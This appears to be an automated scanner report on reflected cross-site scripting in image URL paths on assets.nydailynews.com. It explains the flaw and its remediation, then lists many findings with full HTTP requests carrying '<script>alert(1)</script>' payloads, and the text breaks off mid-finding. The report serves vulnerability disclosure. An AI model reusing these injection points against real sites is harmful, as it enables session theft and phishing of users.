Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea7a2<script>alert(1)</script>2f8bc6b3c17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgea7a2<script>alert(1)</script>2f8bc6b3c17/2009/12/01/170x128-alg_michael-lohan.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:18 GMT Server: Apache Content-Length: 103 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2a7a<script>alert(1)</script>c8db03530fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2009b2a7a<script>alert(1)</script>c8db03530fe/12/01/170x128-alg_michael-lohan.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:17 GMT Server: Apache Content-Length: 103 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b96ee<script>alert(1)</script>fdf835b4cbf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2009/12b96ee<script>alert(1)</script>fdf835b4cbf/01/170x128-alg_michael-lohan.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:24 GMT Server: Apache Content-Length: 103 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 22ecb<script>alert(1)</script>0c17e666a19 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2009/12/0122ecb<script>alert(1)</script>0c17e666a19/170x128-alg_michael-lohan.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:32 GMT Server: Apache Content-Length: 103 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca73c<script>alert(1)</script>078b3872db0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgca73c<script>alert(1)</script>078b3872db0/2010/06/18/170x128-alg_resize_tiger-woods_devon-james.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:07 GMT Server: Apache Content-Length: 120 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11f23<script>alert(1)</script>f879f16ec47 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201011f23<script>alert(1)</script>f879f16ec47/06/18/170x128-alg_resize_tiger-woods_devon-james.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:34 GMT Server: Apache Content-Length: 120 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bdf99<script>alert(1)</script>afd754bd91a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/06bdf99<script>alert(1)</script>afd754bd91a/18/170x128-alg_resize_tiger-woods_devon-james.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:23 GMT Server: Apache Content-Length: 120 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 35edb<script>alert(1)</script>26cdec7655d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/06/1835edb<script>alert(1)</script>26cdec7655d/170x128-alg_resize_tiger-woods_devon-james.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:27 GMT Server: Apache Content-Length: 120 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27224<script>alert(1)</script>fec959f179a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img27224<script>alert(1)</script>fec959f179a/2010/06/25/170x128-alg_iphone4.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:12 GMT Server: Apache Content-Length: 97 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2e386<script>alert(1)</script>d195aa88277 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/20102e386<script>alert(1)</script>d195aa88277/06/25/170x128-alg_iphone4.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:38 GMT Server: Apache Content-Length: 97 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8abc6<script>alert(1)</script>3e1cb482ddb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/068abc6<script>alert(1)</script>3e1cb482ddb/25/170x128-alg_iphone4.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:21 GMT Server: Apache Content-Length: 97 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dbcea<script>alert(1)</script>00fe1cec624 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/06/25dbcea<script>alert(1)</script>00fe1cec624/170x128-alg_iphone4.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:27 GMT Server: Apache Content-Length: 97 Cneonction: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b914<script>alert(1)</script>6514e971517 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img3b914<script>alert(1)</script>6514e971517/2010/07/28/170x128-alg_eddie-cibrian_leann-rimes.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:39 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aa165<script>alert(1)</script>4b6c8bccd2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010aa165<script>alert(1)</script>4b6c8bccd2d/07/28/170x128-alg_eddie-cibrian_leann-rimes.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:21 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9139e<script>alert(1)</script>f786fd08ce2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/079139e<script>alert(1)</script>f786fd08ce2/28/170x128-alg_eddie-cibrian_leann-rimes.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:51 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload db033<script>alert(1)</script>50719421ae0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/07/28db033<script>alert(1)</script>50719421ae0/170x128-alg_eddie-cibrian_leann-rimes.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:35 GMT Server: Apache Content-Length: 115 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 100f2<script>alert(1)</script>433ee83813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img100f2<script>alert(1)</script>433ee83813/2010/10/20/170x128-alg_jimmy_mcmillan_101910.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:20 GMT Server: Apache Content-Length: 110 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13806<script>alert(1)</script>8758d977f87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201013806<script>alert(1)</script>8758d977f87/10/20/170x128-alg_jimmy_mcmillan_101910.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:24 GMT Server: Apache Content-Length: 111 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 51297<script>alert(1)</script>73bbd5b09c2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/1051297<script>alert(1)</script>73bbd5b09c2/20/170x128-alg_jimmy_mcmillan_101910.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:32 GMT Server: Apache Content-Length: 111 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa944<script>alert(1)</script>93525094ea1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/10/20aa944<script>alert(1)</script>93525094ea1/170x128-alg_jimmy_mcmillan_101910.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:59 GMT Server: Apache Content-Length: 111 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cad2c<script>alert(1)</script>877d1e306d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imgcad2c<script>alert(1)</script>877d1e306d6/2010/11/03/130x99-gthmb_politicians.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:27 GMT Server: Apache Content-Length: 103 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63576<script>alert(1)</script>6abf8762607 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201063576<script>alert(1)</script>6abf8762607/11/03/130x99-gthmb_politicians.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:34 GMT Server: Apache Content-Length: 103 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2aa87<script>alert(1)</script>253523b4d8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/112aa87<script>alert(1)</script>253523b4d8f/03/130x99-gthmb_politicians.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:18 GMT Server: Apache Content-Length: 103 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2b933<script>alert(1)</script>760b77bd969 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/032b933<script>alert(1)</script>760b77bd969/130x99-gthmb_politicians.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:21 GMT Server: Apache Content-Length: 103 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4fb73<script>alert(1)</script>c834262e1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img4fb73<script>alert(1)</script>c834262e1b/2010/11/04/130x99-alg_resize_gum-painting.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:58 GMT Server: Apache Content-Length: 108 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc8ff<script>alert(1)</script>f6dd08d7e17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010bc8ff<script>alert(1)</script>f6dd08d7e17/11/04/130x99-alg_resize_gum-painting.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:05 GMT Server: Apache Content-Length: 109 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cbc29<script>alert(1)</script>303671a30bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11cbc29<script>alert(1)</script>303671a30bf/04/130x99-alg_resize_gum-painting.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:31 GMT Server: Apache Content-Length: 109 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e70cc<script>alert(1)</script>aab4a5a0760 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/04e70cc<script>alert(1)</script>aab4a5a0760/130x99-alg_resize_gum-painting.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:14 GMT Server: Apache Content-Length: 109 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86dcf<script>alert(1)</script>258b904ac94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img86dcf<script>alert(1)</script>258b904ac94/2010/11/04/130x99-gthmb_casta_sisters.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:15 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e347d<script>alert(1)</script>08b6881b850 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010e347d<script>alert(1)</script>08b6881b850/11/04/130x99-gthmb_casta_sisters.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:24 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5229e<script>alert(1)</script>6709d7b066a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/115229e<script>alert(1)</script>6709d7b066a/04/130x99-gthmb_casta_sisters.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:08:07 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c21bb<script>alert(1)</script>e95674b66bb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/2010/11/04c21bb<script>alert(1)</script>e95674b66bb/130x99-gthmb_casta_sisters.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:37 GMT Server: Apache Content-Length: 105 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ee61<script>alert(1)</script>fefa76aba40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img4ee61<script>alert(1)</script>fefa76aba40/2010/11/04/170x128-alg_nancy_pelosi.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:02 GMT Server: Apache Content-Length: 102 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57e4d<script>alert(1)</script>2fbe57d5e2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /img/201057e4d<script>alert(1)</script>2fbe57d5e2f/11/04/170x128-alg_nancy_pelosi.jpg HTTP/1.1 Host: assets.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.122.23.218-1434180784.30112896:lv=1289179533825:ss=1289179533825;
Response
HTTP/1.1 400 Bad Request Date: Mon, 08 Nov 2010 07:07:06 GMT Server: Apache Content-Length: 102 nnCoection: close Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4bec3<script>alert(1)</script>e7bc803c8dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
